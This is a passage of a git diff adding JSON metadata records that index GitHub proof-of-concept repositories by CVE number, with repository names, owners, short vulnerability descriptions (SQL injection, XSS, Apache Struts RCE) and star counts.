+ "full_name": "geraldoalcantara\/CVE-2023-49980",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49980",
+ "description": "Best Student Result Management System 1.0 - Directory Listing CVE-2023-49980",
+ "fork": false,
+ "created_at": "2023-11-28T13:40:06Z",
+ "updated_at": "2023-12-20T09:55:11Z",
+ "pushed_at": "2023-12-19T20:12:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49981.json b/2023/CVE-2023-49981.json
new file mode 100644
index 0000000000..2c22538ce6
--- /dev/null
+++ b/2023/CVE-2023-49981.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733749059,
+ "name": "CVE-2023-49981",
+ "full_name": "geraldoalcantara\/CVE-2023-49981",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49981",
+ "description": "School Fees Management System v1.0 - Incorrect Access Control - Directory Listing",
+ "fork": false,
+ "created_at": "2023-12-20T03:19:09Z",
+ "updated_at": "2023-12-20T09:55:44Z",
+ "pushed_at": "2023-12-20T09:21:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49982.json b/2023/CVE-2023-49982.json
new file mode 100644
index 0000000000..04faab6fbc
--- /dev/null
+++ b/2023/CVE-2023-49982.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733754634,
+ "name": "CVE-2023-49982",
+ "full_name": "geraldoalcantara\/CVE-2023-49982",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49982",
+ "description": "School Fees Management System v1.0 - Incorrect Access Control - Privilege Escalation",
+ "fork": false,
+ "created_at": "2023-12-20T03:44:16Z",
+ "updated_at": "2023-12-20T09:56:25Z",
+ "pushed_at": "2023-12-20T03:45:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49983.json b/2023/CVE-2023-49983.json
new file mode 100644
index 0000000000..7145750f94
--- /dev/null
+++ b/2023/CVE-2023-49983.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733757280,
+ "name": "CVE-2023-49983",
+ "full_name": "geraldoalcantara\/CVE-2023-49983",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49983",
+ "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/class\"",
+ "fork": false,
+ "created_at": "2023-12-20T03:56:16Z",
+ "updated_at": "2023-12-20T09:57:00Z",
+ "pushed_at": "2023-12-20T09:25:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49984.json b/2023/CVE-2023-49984.json
new file mode 100644
index 0000000000..90696d489f
--- /dev/null
+++ b/2023/CVE-2023-49984.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733759340,
+ "name": "CVE-2023-49984",
+ "full_name": "geraldoalcantara\/CVE-2023-49984",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49984",
+ "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/settings\"",
+ "fork": false,
+ "created_at": "2023-12-20T04:06:00Z",
+ "updated_at": "2023-12-20T09:57:47Z",
+ "pushed_at": "2023-12-20T09:26:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49985.json b/2023/CVE-2023-49985.json
new file mode 100644
index 0000000000..c93b3a45c5
--- /dev/null
+++ b/2023/CVE-2023-49985.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733760666,
+ "name": "CVE-2023-49985",
+ "full_name": "geraldoalcantara\/CVE-2023-49985",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49985",
+ "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"cname\" parameter on \"new_class\"",
+ "fork": false,
+ "created_at": "2023-12-20T04:12:02Z",
+ "updated_at": "2023-12-20T09:58:25Z",
+ "pushed_at": "2023-12-20T09:29:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49986.json b/2023/CVE-2023-49986.json
new file mode 100644
index 0000000000..e2de6d62cf
--- /dev/null
+++ b/2023/CVE-2023-49986.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733762762,
+ "name": "CVE-2023-49986",
+ "full_name": "geraldoalcantara\/CVE-2023-49986",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49986",
+ "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" parameter on \"add_new_parent\"",
+ "fork": false,
+ "created_at": "2023-12-20T04:21:46Z",
+ "updated_at": "2023-12-20T09:59:09Z",
+ "pushed_at": "2023-12-20T04:28:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49987.json b/2023/CVE-2023-49987.json
new file mode 100644
index 0000000000..eaa93da458
--- /dev/null
+++ b/2023/CVE-2023-49987.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733764792,
+ "name": "CVE-2023-49987",
+ "full_name": "geraldoalcantara\/CVE-2023-49987",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49987",
+ "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"tname\" parameter on \"new_term\"",
+ "fork": false,
+ "created_at": "2023-12-20T04:30:49Z",
+ "updated_at": "2023-12-20T09:59:43Z",
+ "pushed_at": "2023-12-20T04:34:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49988.json b/2023/CVE-2023-49988.json
new file mode 100644
index 0000000000..517b257af6
--- /dev/null
+++ b/2023/CVE-2023-49988.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733766007,
+ "name": "CVE-2023-49988",
+ "full_name": "geraldoalcantara\/CVE-2023-49988",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49988",
+ "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"npss\" parameter at rooms.php",
+ "fork": false,
+ "created_at": "2023-12-20T04:36:35Z",
+ "updated_at": "2023-12-20T10:00:28Z",
+ "pushed_at": "2023-12-20T09:35:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49989.json b/2023/CVE-2023-49989.json
new file mode 100644
index 0000000000..fe516e9dd7
--- /dev/null
+++ b/2023/CVE-2023-49989.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733768261,
+ "name": "CVE-2023-49989",
+ "full_name": "geraldoalcantara\/CVE-2023-49989",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49989",
+ "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"id\" parameter at update.php",
+ "fork": false,
+ "created_at": "2023-12-20T04:46:28Z",
+ "updated_at": "2023-12-20T10:01:07Z",
+ "pushed_at": "2023-12-20T09:37:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50029.json b/2023/CVE-2023-50029.json
new file mode 100644
index 0000000000..ec2e72ab4f
--- /dev/null
+++ b/2023/CVE-2023-50029.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819640713,
+ "name": "PHP-Injection-in-M4-PDF-Extensions",
+ "full_name": "absholi7ly\/PHP-Injection-in-M4-PDF-Extensions",
+ "owner": {
+ "login": "absholi7ly",
+ "id": 72062217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4",
+ "html_url": "https:\/\/github.com\/absholi7ly"
+ },
+ "html_url": "https:\/\/github.com\/absholi7ly\/PHP-Injection-in-M4-PDF-Extensions",
+ "description": "CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module",
+ "fork": false,
+ "created_at": "2024-06-24T23:26:05Z",
+ "updated_at": "2024-06-24T23:31:50Z",
+ "pushed_at": "2024-06-24T23:31:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50070.json b/2023/CVE-2023-50070.json
new file mode 100644
index 0000000000..82acfa8d63
--- /dev/null
+++ b/2023/CVE-2023-50070.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732171989,
+ "name": "CVE-2023-50070",
+ "full_name": "geraldoalcantara\/CVE-2023-50070",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50070",
+ "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.",
+ "fork": false,
+ "created_at": "2023-12-15T20:37:39Z",
+ "updated_at": "2024-02-16T12:23:24Z",
+ "pushed_at": "2023-12-29T23:05:21Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50071.json b/2023/CVE-2023-50071.json
new file mode 100644
index 0000000000..d69b3ca933
--- /dev/null
+++ b/2023/CVE-2023-50071.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732511226,
+ "name": "CVE-2023-50071",
+ "full_name": "geraldoalcantara\/CVE-2023-50071",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50071",
+ "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.",
+ "fork": false,
+ "created_at": "2023-12-16T23:06:25Z",
+ "updated_at": "2024-02-26T02:00:12Z",
+ "pushed_at": "2024-03-01T11:57:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50072.json b/2023/CVE-2023-50072.json
new file mode 100644
index 0000000000..4676579cf4
--- /dev/null
+++ b/2023/CVE-2023-50072.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733963314,
+ "name": "CVE-2023-50072",
+ "full_name": "ahrixia\/CVE-2023-50072",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-50072",
+ "description": "A stored cross-site scripting (XSS) vulnerability exists in OpenKM version 7.1.40.",
+ "fork": false,
+ "created_at": "2023-12-20T14:36:01Z",
+ "updated_at": "2024-01-06T04:03:15Z",
+ "pushed_at": "2024-01-25T07:14:57Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50131.json b/2023/CVE-2023-50131.json
new file mode 100644
index 0000000000..a331af9235
--- /dev/null
+++ b/2023/CVE-2023-50131.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732301458,
+ "name": "CVE-2023-50131",
+ "full_name": "sajaljat\/CVE-2023-50131",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50131",
+ "description": "XSS ",
+ "fork": false,
+ "created_at": "2023-12-16T08:08:11Z",
+ "updated_at": "2023-12-16T08:08:11Z",
+ "pushed_at": "2023-12-16T08:12:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50132.json b/2023/CVE-2023-50132.json
new file mode 100644
index 0000000000..4022ee3319
--- /dev/null
+++ b/2023/CVE-2023-50132.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732302850,
+ "name": "CVE-2023-50132",
+ "full_name": "sajaljat\/CVE-2023-50132",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50132",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-16T08:14:14Z",
+ "updated_at": "2023-12-16T08:14:14Z",
+ "pushed_at": "2023-12-16T08:16:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50164.json b/2023/CVE-2023-50164.json
new file mode 100644
index 0000000000..38d0fac011
--- /dev/null
+++ b/2023/CVE-2023-50164.json
@@ -0,0 +1,338 @@
+[
+ {
+ "id": 731065261,
+ "name": "CVE-2023-50164-Apache-Struts-RCE",
+ "full_name": "jakabakos\/CVE-2023-50164-Apache-Struts-RCE",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-50164-Apache-Struts-RCE",
+ "description": "A critical security vulnerability, identified as CVE-2023-50164 (CVE: 9.8) was found in Apache Struts, allowing attackers to manipulate file upload parameters that can potentially lead to unauthorized path traversal and remote code execution (RCE).",
+ "fork": false,
+ "created_at": "2023-12-13T09:31:36Z",
+ "updated_at": "2024-06-21T00:11:47Z",
+ "pushed_at": "2024-04-04T14:33:11Z",
+ "stargazers_count": 74,
+ "watchers_count": 74,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 74,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 732181811,
+ "name": "CVE-2023-50164",
+ "full_name": "bcdannyboy\/CVE-2023-50164",
+ "owner": {
+ "login": "bcdannyboy",
+ "id": 12553297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4",
+ "html_url": "https:\/\/github.com\/bcdannyboy"
+ },
+ "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-50164",
+ "description": "A scanning utility and PoC for CVE-2023-50164",
+ "fork": false,
+ "created_at": "2023-12-15T21:19:51Z",
+ "updated_at": "2024-06-05T13:33:18Z",
+ "pushed_at": "2023-12-15T23:50:17Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 732688819,
+ "name": "cve-2023-50164-poc",
+ "full_name": "dwisiswant0\/cve-2023-50164-poc",
+ "owner": {
+ "login": "dwisiswant0",
+ "id": 25837540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4",
+ "html_url": "https:\/\/github.com\/dwisiswant0"
+ },
+ "html_url": "https:\/\/github.com\/dwisiswant0\/cve-2023-50164-poc",
+ "description": "Proof of Concept for Path Traversal in Apache Struts (\"CVE-2023-50164\")",
+ "fork": false,
+ "created_at": "2023-12-17T14:18:54Z",
+ "updated_at": "2024-06-14T01:14:13Z",
+ "pushed_at": "2023-12-18T02:46:21Z",
+ "stargazers_count": 57,
+ "watchers_count": 57,
+ "has_discussions": true,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 57,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 732950140,
+ "name": "cve-2023-50164",
+ "full_name": "helsecert\/cve-2023-50164",
+ "owner": {
+ "login": "helsecert",
+ "id": 2202200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4",
+ "html_url": "https:\/\/github.com\/helsecert"
+ },
+ "html_url": "https:\/\/github.com\/helsecert\/cve-2023-50164",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-18T08:24:26Z",
+ "updated_at": "2024-01-13T09:38:24Z",
+ "pushed_at": "2023-12-18T13:29:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 733837034,
+ "name": "CVE-2023-50164-Apache-Struts-RCE",
+ "full_name": "Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE",
+ "owner": {
+ "login": "Thirukrishnan",
+ "id": 63901950,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4",
+ "html_url": "https:\/\/github.com\/Thirukrishnan"
+ },
+ "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-20T08:39:54Z",
+ "updated_at": "2024-01-23T11:26:28Z",
+ "pushed_at": "2023-12-20T09:51:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733839177,
+ "name": "CVE-2023-50164-ApacheStruts2-Docker",
+ "full_name": "Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker",
+ "owner": {
+ "login": "Trackflaw",
+ "id": 78696986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4",
+ "html_url": "https:\/\/github.com\/Trackflaw"
+ },
+ "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker",
+ "description": "Vulnerable docker container for Apache Struts 2 RCE CVE-2023-50164",
+ "fork": false,
+ "created_at": "2023-12-20T08:46:19Z",
+ "updated_at": "2024-05-14T07:52:52Z",
+ "pushed_at": "2023-12-20T12:57:28Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734560456,
+ "name": "cve-2023-50164",
+ "full_name": "miles3719\/cve-2023-50164",
+ "owner": {
+ "login": "miles3719",
+ "id": 104630628,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104630628?v=4",
+ "html_url": "https:\/\/github.com\/miles3719"
+ },
+ "html_url": "https:\/\/github.com\/miles3719\/cve-2023-50164",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-22T02:15:36Z",
+ "updated_at": "2023-12-22T02:15:36Z",
+ "pushed_at": "2023-12-22T02:15:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734561364,
+ "name": "cve-2023-50164",
+ "full_name": "aaronm-sysdig\/cve-2023-50164",
+ "owner": {
+ "login": "aaronm-sysdig",
+ "id": 132866139,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132866139?v=4",
+ "html_url": "https:\/\/github.com\/aaronm-sysdig"
+ },
+ "html_url": "https:\/\/github.com\/aaronm-sysdig\/cve-2023-50164",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-22T02:20:11Z",
+ "updated_at": "2024-01-13T09:38:29Z",
+ "pushed_at": "2024-01-01T03:25:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737392401,
+ "name": "CVE-2023-50164-POC",
+ "full_name": "snyk-labs\/CVE-2023-50164-POC",
+ "owner": {
+ "login": "snyk-labs",
+ "id": 47793611,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4",
+ "html_url": "https:\/\/github.com\/snyk-labs"
+ },
+ "html_url": "https:\/\/github.com\/snyk-labs\/CVE-2023-50164-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-30T21:37:08Z",
+ "updated_at": "2024-03-25T07:18:41Z",
+ "pushed_at": "2024-01-16T14:59:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 742353008,
+ "name": "CVE-2023-50164-PoC",
+ "full_name": "sunnyvale-it\/CVE-2023-50164-PoC",
+ "owner": {
+ "login": "sunnyvale-it",
+ "id": 44291039,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4",
+ "html_url": "https:\/\/github.com\/sunnyvale-it"
+ },
+ "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2023-50164-PoC",
+ "description": "CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept",
+ "fork": false,
+ "created_at": "2024-01-12T09:34:57Z",
+ "updated_at": "2024-01-25T20:19:52Z",
+ "pushed_at": "2024-01-16T13:05:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 787494467,
+ "name": "CVE-2023-50164Analysis-",
+ "full_name": "AsfandAliMemon25\/CVE-2023-50164Analysis-",
+ "owner": {
+ "login": "AsfandAliMemon25",
+ "id": 154571318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154571318?v=4",
+ "html_url": "https:\/\/github.com\/AsfandAliMemon25"
+ },
